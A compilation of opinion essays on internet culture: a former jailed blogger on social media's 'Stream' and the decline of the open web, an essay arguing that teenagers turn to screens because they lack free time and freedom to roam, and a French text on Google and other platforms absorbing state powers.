But apps like Instagram are blind — or almost blind. Their gaze goes nowhere except inwards, reluctant to transfer any of their vast powers to others, leading them into quiet deaths. The consequence is that web pages outside social media are dying.
Even before I went to jail, though, the power of hyperlinks was being curbed. Its biggest enemy was a philosophy that combined two of the most dominant, and most overrated, values of our times: novelty and popularity, reflected by the real world dominance of young celebrities. That philosophy is the Stream.
The Stream now dominates the way people receive information on the web. Fewer users are directly checking dedicated webpages, instead getting fed by a never-ending flow of information that’s picked for them by complex –and secretive — algorithms.
The Stream means you don’t need to open so many websites any more. You don’t need numerous tabs. You don’t even need a web browser. You open Twitter or Facebook on your smartphone and dive deep in. The mountain has come to you. Algorithms have picked everything for you. According to what you or your friends have read or seen before, they predict what you might like to see. It feels great not to waste time in finding interesting things on so many websites.
But are we missing something here? What are we exchanging for efficiency?
In many apps, the votes we cast — the likes, the plusses, the stars, the hearts — are actually more related to cute avatars and celebrity status than to the substance of what’s posted. A most brilliant paragraph by some ordinary-looking person can be left outside the Stream, while the silly ramblings of a celebrity gain instant Internet presence.
And not only do the algorithms behind the Stream equate newness and popularity with importance, they also tend to show us more of what we’ve already liked. These services carefully scan our behaviour and delicately tailor our news feeds with posts, pictures and videos that they think we would most likely want to see.
Popularity is not wrong in and of itself, but it has its own perils. In a free-market economy, low-quality goods with the wrong prices are doomed to failure. Nobody gets upset when a quiet Brooklyn cafe with bad lattes and rude servers goes out of business. But opinions are not the same as material goods or services. They won’t disappear if they are unpopular or even bad. In fact, history has proven that most big ideas (and many bad ones) have been quite unpopular for a long time, and their marginal status has only strengthened them. Minority views are radicalized when they can’t be expressed and recognized.
Today the Stream is digital media’s dominant form of organizing information. It’s in every social network and mobile application. Since I gained my freedom, everywhere I turn I see the Stream. I guess it won’t be too long before we see news websites organize their entire content based on the same principles. The prominence of the Stream today doesn’t just make vast chunks of the Internet biased against quality — it also means a deep betrayal to the diversity that the world wide web had originally envisioned.
There’s no question to me that the diversity of themes and opinions is less online today than it was in the past. New, different, and challenging ideas get suppressed by today’s social networks because their ranking strategies prioritize the popular and habitual. (No wonder why Apple is hiring human editors for its news app.) But diversity is being reduced in other ways, and for other purposes.
Some of it is visual. Yes, it is true that all my posts on Twitter and Facebook look something similar to a personal blog: They are collected in reverse-chronological order, on a specific webpage, with direct web addresses to each post. But I have very little control over how it looks like; I can’t personalize it much. My page must follow a uniform look which the designers of the social network decide for me.
The centralization of information also worries me because it makes it easier for things to disappear. After my arrest, my hosting service closed my account, because I wasn’t able to pay its monthly fee. But at least I had a backup of all my posts in a database on my own web server. (Most blogging platforms used to enable you to transfer your posts and archives to your own web space, whereas now most platforms don’t let you so.) Even if I didn’t, the Internet archive might keep a copy. But what if my account on Facebook or Twitter is shut down for any reason? Those services themselves may not die any time soon, but it would be not too difficult to imagine a day many American services shut down accounts of anyone who is from Iran, as a result of the current regime of sanctions. If that happened, I might be able to download my posts in some of them, and let’s assume the backup can be easily imported into another platform. But what about the unique web address for my social network profile? Would I be able to claim it back later, after somebody else has possessed it? Domain names switch hands, too, but managing the process is easier and more clear— especially since there is a financial relationship between you and the seller which makes it less prone to sudden and untransparent decisions.
But the scariest outcome of the centralization of information in the age of social networks is something else: It is making us all much less powerful in relation to governments and corporations.
Surveillance is increasingly imposed on civilized lives, and it just gets worse as time goes by. The only way to stay outside of this vast apparatus of surveillance might be to go into a cave and sleep, even if you can’t make it 300 years.
Being watched is something we all eventually have to get used to and live with and, sadly, it has nothing to do with the country of our residence. Ironically enough, states that cooperate with Facebook and Twitter know much more about their citizens than those, like Iran, where the state has a tight grip on the Internet but does not have legal access to social media companies.
What is more frightening than being merely watched, though, is being controlled. When Facebook can know us better than our parents with only 150 likes, and better than our spouses with 300 likes, the world appears quite predictable, both for governments and for businesses. And predictability means control.
Middle-class Iranians, like most people in the world, are obsessed with new trends. Utility or quality of things usually comes second to their trendiness. In early 2000s writing blogs made you cool and trendy, then around 2008 Facebook came in and then Twitter. Since 2014 the hype is all about Instagram, and no one knows what is next. But the more I think about these changes, the more I realize that even all my concerns might have been misdirected. Perhaps I am worried about the wrong thing. Maybe it’s not the death of the hyperlink, or the centralization, exactly.
Maybe it’s that text itself is disappearing. After all, the first visitors to the web spent their time online reading web magazines. Then came blogs, then Facebook, then Twitter. Now it’s Facebook videos and Instagram and SnapChat that most people spend their time on. There’s less and less text to read on social networks, and more and more video to watch, more and more images to look at. Are we witnessing a decline of reading on the web in favor of watching and listening?
Is this trend driven by people’s changing cultural habits, or is it that people are following the new laws of social networking? I don’t know — that’s for researchers to find out — but it feels like it’s reviving old cultural wars. After all, the web started out by imitating books and for many years, it was heavily dominated by text, by hypertext. Search engines put huge value on these things, and entire companies — entire monopolies — were built off the back of them. But as the number of image scanners and digital photos and video cameras grows exponentially, this seems to be changing. Search tools are starting to add advanced image recognition algorithms; advertising money is flowing there.
But the Stream, mobile applications, and moving images: They all show a departure from a books-internet toward a television-internet. We seem to have gone from a non-linear mode of communication — nodes and networks and links — toward a linear one, with centralization and hierarchies.
The web was not envisioned as a form of television when it was invented. But, like it or not, it is rapidly resembling TV: linear, passive, programmed and inward-looking.
When I log on to Facebook, my personal television starts. All I need to do is to scroll: New profile pictures by friends, short bits of opinion on current affairs, links to new stories with short captions, advertising, and of course self-playing videos. I occasionally click on like or share button, read peoples’ comments or leave one, or open an article. But I remain inside Facebook, and it continues to broadcast what I might like. This is not the web I knew when I went to jail. This is not the future of the web. This future is television.
Sometimes I think maybe I’m becoming too strict as I age. Maybe this is all a natural evolution of a technology. But I can’t close my eyes to what’s happening: A loss of intellectual power and diversity, and on the great potentials it could have for our troubled time. In the past, the web was powerful and serious enough to land me in jail. Today it feels like little more than entertainment. So much that even Iran doesn’t take some — Instagram, for instance — serious enough to block.
I miss when people took time to be exposed to different opinions, and bothered to read more than a paragraph or 140 characters. I miss the days when I could write something on my own blog, publish on my own domain, without taking an equal time to promote it on numerous social networks; when nobody cared about likes and reshares.
That’s the web I remember before jail. That’s the web we have to save.
Even though multiple generations have now grown up glued to the flickering light of the TV, we still can’t let go of the belief that the next generation of technology is going to doom our kids. We blame technology, rather than work, to understand why children engage with screens in the first place.
I’ve spent over a decade observing young people’s practices with technology and interviewing families about the dynamics that unfold. When I began my research, I expected to find hordes of teenagers who were escaping “real life” through the Internet. That was certainly my experience. As a geeky, queer youth growing up in suburban America in the early 1990s, the Internet was the only place where I didn’t feel judged. I wanted to go virtual, for my body to not matter, to live in a digital-only world.
If Americans truly want to reduce the amount young people use technology, we should free up more of their time.
To my surprise — and, as I grew older, relief — that differed from what most youth want. Early on in my research, I met a girl in Michigan who told me that she’d much rather get together with her friends in person, but she had so many homework demands and her parents were often concerned about her physical safety. This is why she loved the Internet: She could hang out with her friends there. I've heard this reasoning echoed by youth around the country.
This is the Catch-22 that we’ve trapped today’s youth in. We’ve locked them indoors because we see the physical world as more dangerous than ever before, even though by almost every measure, we live in the safest society to date. We put unprecedented demands on our kids, maxing them out with structured activities, homework and heavy expectations. And then we’re surprised when they’re frazzled and strung out.
For many teenagers, technology is a relief valve. (And that goes for the strung-out, overworked parents and adults playing Candy Crush, too.) It’s not the inherently addictive substance that fretting parents like to imagine. It simply provides an outlet.
The presence of technology alone is not the issue. We see much higher levels of concern about technology “addiction” in countries where there’s even greater pressure to succeed and fewer social opportunities (e.g., China, South Korea, etc.).
If Americans truly want to reduce the amount young people use technology, we should free up more of their time.
For one thing, we could radically reduce the amount of homework and tests American youth take. Finland and the Netherlands consistently outperform the U.S. in school, and they emphasize student happiness, assigning almost no homework. (To be sure, they also respect their teachers and pay them what they’re worth.) When I lecture in these countries, parents don't seem nearly as anxious about technology addiction as Americans.
We should also let children roam. It seems like every few weeks I read a new story about a parent who was visited by child services for letting their school-aged children out of their sight. Indeed, studies in the U.S. and the U.K. consistently show that children have lost the right to roam.
This is why many of our youth turn to technology. They aren’t addicted to the computer; they’re addicted to interaction, and being around their friends. Children, and especially teenagers, don’t want to only socialize with parents and siblings; they want to play with their peers. That’s how they make sense of the world. And we’ve robbed them of that opportunity because we’re afraid of boogeymen.
We’re raising our children in captivity and they turn to technology to socialize, learn and decompress. Why are we blaming the screens?
« Google et de manière plus générale les grands services de l’Internet (le plus souvent californiens) sont en train de prendre, sans qu’on s’en rende compte, la place de l’État, des États, dans la gestion quotidienne de nos droits et libertés. Cette évolution quasiment invisible s’est faite avec l’assentiment tacite (parce que l’enjeu est incompris) des citoyens-internautes-clients, et avec la complicité aveugle des gouvernements qui, par manque de vision politique, ont cédé chaque jour davantage de terrain en croyant y trouver leur intérêt. Si, en moins de vingt ans, une entreprise comme Google a pu prendre une place aussi gigantesque dans le cœur même des usages et des infrastructures numériques, c’est qu’elle a su maîtriser son développement sur tous les fronts.
Internet est un espace et un réseau qui, par sa nature, a vocation à mettre en relation les uns avec les autres des ordinateurs, dans une construction non-pyramidale. L’immense nouveauté d’Internet, par opposition à la transmission « hors ligne » des informations ou au Minitel, par exemple, c’est cette organisation décentralisée, « neutre » techniquement, où il suffit de se brancher pour avoir accès à tout le réseau. C’est ainsi qu’Internet a pu tisser ce qu’on a rapidement appelé, dans le monde entier (ou presque), une « Toile ». Forcément, c’était un peu déstabilisant. Et quiconque se projette dans l’Internet pré-Google se souvient de l’importance absolument cruciale des annuaires et des premiers moteurs de recherche pour trouver, ou tenter de trouver, ce qu’on cherchait sur cette Toile en apparence anarchique.
Et puis sont arrivées les grandes plateformes, telles Google, Amazon, etc., à partir du début des années 2000. Des services web à vocation hégémonique, qui ont fondé leur développement uniquement sur la publicité, et sur une publicité exploitant nos comportements de navigation et nos données personnelles. Il me semble que c’est ainsi que le rêve de substitution googlien décrit dans ce livre a pu se développer. Il serait injuste d’ailleurs de ne parler que de Google : d’autres entreprises comme Facebook, Apple, Amazon, etc., fonctionnent de la même façon. Leurs caractéristiques et manières d’agir sont communes.
Avant tout, s’imposer sur un domaine en fournissant le « meilleur » service. Que ce service soit simple d’utilisation, que l’exploitation massive de données et la « fermeture » soient organisées pour servir le client et lui apporter ce qu’il veut. Ce qu’il cherche. Qu’il ne se pose aucune question et soit satisfait dans ses besoins primaires : obtenir une réponse satisfaisante à sa recherche, trouver ou retrouver des amis et pouvoir échanger avec eux, trouver un livre, une musique, en trois clics.
Améliorer en permanence les services en se basant sur une centralisation et une exploitation massive des données personnelles et de navigation. Petit à petit, réduire le périmètre d’exploration et de navigation de l’internaute. Orienter les résultats, montrer des contenus « associés », reproposer encore et encore des contenus similaires. Détruire petit à petit ce qui est peut être la plus grande qualité d’Internet : la sérendipité, soit la possibilité de faire des découvertes accidentelles.
Après avoir réussi l’hégémonie, le monopole « horizontal », développer une concentration verticale. Posséder et développer toute la chaîne de production de l’Internet. Comme l’explique le texte que vous venez de lire, que Google tire ses propres câbles sous-marins ou produise son électricité est un signe majeur de la concentration inouïe du secteur. Un signe majeur de l’emprise verticale qu’une entreprise (au départ dédiée aux moteurs de recherche) a pu prendre sur le secteur technologique.
Il devient alors facile pour ces innovateurs talentueux, grisés par leur succès et idéologiquement convertis à une technophilie virant parfois au transhumanisme (la foi en l’amélioration physique et mentale de l’Humain par la technique), de rêver de vivre sans État et, via une transformation « liquide » et insensible des règles de la société, de faire le saut de l’utopie politique et sociale.
Il faut dire que les États se montrent bien impuissants, dépassés, voire complices de cette évolution. Ils délèguent des pans entiers de leurs missions régaliennes à ces géants, sans qu’il semble y avoir eu une quelconque réflexion préalable sur les bouleversements politiques et sociaux que cela peut entraîner. Oui, Google et ses comparses sont en train de dominer le monde et d’en créer un nouveau. Mais ils le peuvent parce que nous et nos États les laissons faire.
Quand la NSA (National Security Agency) n’a plus besoin de faire elle-même la collecte des données des internautes du monde entier pour pratiquer sa surveillance de masse, puisqu’elle n’a qu’à aller les chercher directement chez les géants de l’Internet, le gouvernement américain n’a aucun intérêt à ce que ce modèle économique basé sur les données personnelles ne s’arrête. Les services de renseignement du monde entier peuvent ensuite, sur le grand marché de la surveillance, venir chercher ce dont ils ont besoin.
Les pouvoirs régaliens fragilisés sont récupérés par des entreprises avides de combler ces manques
Quand la Cour de justice de l’Union européenne demande à Google et aux moteurs de recherche de masquer, à leur discrétion, des résultats au nom du « droit à l’oubli », elle entérine le fait que la mémoire collective, le droit à l’information, qui passent aujourd’hui prioritairement par Internet, sont gérés par une entreprise privée. Hors de toute décision judiciaire, Google décide ce qui doit ou ne doit pas être accessible aux yeux du monde.
Quand les ayants droit de l’industrie de la culture et du divertissement demandent que les services Web cessent de donner accès à des contenus violant le droit d’auteur, là encore sans décision judiciaire, ils entérinent le fait que l’expression culturelle individuelle et le partage de contenus puisse être soumis aux choix des robots de Google. C’est ainsi qu’à la demande de ces ayants droit, des robots traquent, sur YouTube, les contenus qui leur semblent enfreindre les droits d’auteur et les suppriment sans discussion, entraînant de nombreux abus contre lesquels les internautes sont souvent impuissants à agir. La justice n’intervient pas en amont de ces décisions et c’est ensuite à l’internaute de prouver son « honnêteté » pour que ses contenus soient remis en ligne.
Quand des ministres du gouvernement français préfèrent que les services Web et les réseaux sociaux gèrent les abus de langage en « prenant leurs responsabilités », ils leur délèguent un de nos droits les plus fondamentaux : la liberté d’expression.
Quand des entreprises américaines comme Facebook ou Apple proposent à leurs employées de congeler leurs ovocytes pour les laisser « libres » de reporter leurs grossesses et leur permettre de ne pas « gâcher leurs carrières », c’est la vie privée dans ce qu’elle a de plus intime qui est prise en charge par l’entreprise.
Quand les pays africains se réjouissent qu’un Google ou un Facebook mettent en place gratuitement des infrastructures d’accès à Internet, sans se préoccuper de l’objectif final de ces entreprises, ils se défaussent de leurs responsabilités et acceptent que l’accès au monde numérique soit totalement dépendant des objectifs commerciaux de ces acteurs.
Ces exemples montrent qu’en actant, sans y réfléchir plus avant, la puissance phénoménale de ces nouvelles entreprises sur des pans de plus en plus grands de toute notre vie, bien au-delà des services mis en avant par les entreprises, les gouvernements et les citoyens ont baissé les bras ou n’ont, en tout cas, pas pris la mesure de ce qu’ils abandonnent à Google, à Facebook, à Apple, Amazon et autres géants.
Dans une période de crise économique et politique généralisée, il n’est pas étonnant que les pouvoirs régaliens soient fragilisés et récupérés par des entreprises avides de combler ces manques. La rapidité des évolutions technologiques pour des dirigeants politiques souvent dépassés et en carence de pensée politique à long terme aggrave le problème. Le monde ne se divise pas entre technophiles et technophobes. Penser ainsi, c’est entrer dans le jeu des United States of Google. C’est croire qu’on n’a le choix qu’entre un repli mortifère dans le passé ou une fuite en avant vers la gestion algorithmique de nos vies.
Il faut absolument lire ceux qui réfléchissent sur l’avenir du numérique. Comme Fred Turner, cité dans ce texte, qui montre brillamment comment l’utopie technophile ne peut servir d’alternative à la société politique. Qu’il faille changer de politique et que les gouvernements aient à se réinventer, cela paraît évident. Cela ne signifie surtout pas que l’on doive céder à la facilité en délégant la gestion de nos droits fondamentaux ou de la sphère publique à des entreprises dont la principale préoccupation est, évidemment, leur résultat économique. Non, Google ne nous offrira pas de vies meilleures. Google change le monde à son profit, et ce but est naturel pour une entreprise. À nous de savoir ce que nous voulons faire de ce monde numérique qui bouleverse nos vies depuis vingt ans.
Le devoir des citoyens et des politiques est de voir plus loin. De choisir et de dessiner la société qu’ils veulent. De ne pas penser la Loi en réaction aux mastodontes de l’Internet, ou au contraire en leur cédant tout, mais en pensant à l’intérêt général, et d’abord à celui des citoyens.
Nos libertés fondamentales sont fragiles. Elles étaient fragiles hier, mais davantage cloisonnées entre espace public, espace privé, espace économique, espace politique. Aujourd’hui tout se retrouve sur Internet et les espaces se rejoignent et s’entremêlent intimement. Il est d’autant plus important de mesurer ces évolutions et de légiférer intelligemment. Économie et libertés, politique et vie privée sont imbriquées comme elles ne l’ont sans doute jamais été dans l’Histoire.
Nous avons la chance de vivre une époque de mutation fondamentale dans l’histoire humaine. Il appartient collectivement à tous les acteurs de nos sociétés d’en faire une révolution au service de l’Homme et non un abandon généralisé de nos valeurs à quelques acteurs dominants ou à des États sans gouvernail.
Internet a donné la possibilité à chacun de faire entendre sa voix. Qu’en ferons-nous ? »